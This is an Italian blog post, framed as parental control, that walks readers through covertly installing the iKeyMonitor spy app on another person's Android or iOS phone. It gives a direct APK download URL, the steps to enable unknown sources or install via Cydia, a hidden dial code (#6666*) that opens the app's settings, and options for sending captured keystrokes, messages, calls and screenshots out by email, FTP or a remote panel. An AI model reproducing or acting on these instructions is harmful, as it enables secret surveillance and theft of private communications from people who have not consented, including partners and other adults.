Spiare Cellulare Android iOS con iKeyMonitor

Spiare Cellulare Android iOS con iKeyMonitor

Spiare cellulare può essere fondamentale per controllare i propri figli minorenni in modo da sapere se c’è qualcosa che non va, tenerli sotto controllo e tutelarli sempre al massimo.

Hai sempre voluto farlo ma non hai mai trovato un metodo facile ed abbastanza economico? Come già ti ho fatto vedere, c’è ne sono tanti: KidLogger, Spymaster Pro, Cerberus, WhatsDog, WhatsOnlinei migliori software spia del 2016 ed altri. Oggi ti parlo di un altro software in grado di spiare cellulare ovvero iKeyMonitor.

Spiare Cellulare Android con iKeyMonitor

spiare cellulare

iKeyMonitor è un software di monitoraggio completo che permette di registrare frasi digitate, cronologia delle chiamate, messaggi inviati e ricevuti whatsapp, catturare screenshot a intervalli di tempo regolari e molto altro ancora.

Requisiti:

Procedimento:

1) Per prima cosa dovrete ovviamente acquistare iKeyMonitor (riceverete una mail di conferma con i dati di accesso)

2) Dopodiché prendete il cellulare da spiare ed abilitate le “Sorgenti Sconosciute“(o Fonti Sconosciute). per farlo seguite il percorso Impostazioni → Sicurezza e abilitate la voce “Sorgenti Sconosciute” ( questo procedimento può variare in caso abbiate una rom diversa da Android Stock)

3) Ora aprite il browser del dispositivo e inserite questa url per avviare il download dell’app (oppure premete direttamente sul link):

http://dl.amobilespy.com/ispytracker.apk

4) Una volta scaricato, installate iKeyMonitor

5) Adesso andate nel tastierino telefonico, digitate #6666* e premete il tasto per avviare la chiamata (ovviamente non chiamerete nessuno, ma vi si aprirà la schermata di iKeyMonitor per accedere alle impostazioni di configurazione)

Nelle impostazioni potrete inserire i dati SMTP del vostro indirizzo email, così da ricevere tutti i dati tracciati direttamente nella vostra casella mail oppure i dati FTP per ricevere i logs direttamente li dentro.

Ma la cosa migliore è senza dubbio l’utilizzo del controllo remoto direttamente dal pannello di controllo di iKeyMonitor (potrete accedere al pannello con le credenziali ricevute via mail dopo l’acquisto del servizio)

Spiare Cellulare iOS con iKeyMonitor

spiare cellulare

Requisiti:

Procedimento:

1) Prima di tutto dovrete ovviamente acquistare iKeyMonitor

2) Dopodiché aprite il browser Safari e nella barra degli indirizzi digitate localhost:8888 e poi premete su Vai per confermare

3) Ora potrete avviare Cydia, premere sul pulsante Cerca e digitare iKeyMonitor per trovare l’app (assicuratevi di selezionare quella proveniente dalla sorgente “BigBoss“)

4) Quando avrete trovato l’app premete su Installa e poi Conferma

Per utilizzare il controllo remoto andate nel pannello di controllo di iKeyMonitor (potrete accedere al pannello con le credenziali ricevute via mail dopo l’acquisto del servizio)

Una volta che sarete dentro il pannello di controllo (sia con Android sia con iOS) troverete tutto quello di cui avete bisogno, in modo ordinato ed intuitivo. Anche se questi servizi hanno un minimo costo, spiare cellulare per tutelare i propri figli e saper intervenire in tempo è davvero fondamentale.

Potrebbero anche interessarti:

Avatar

Angelo Emanuele Lombardo

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *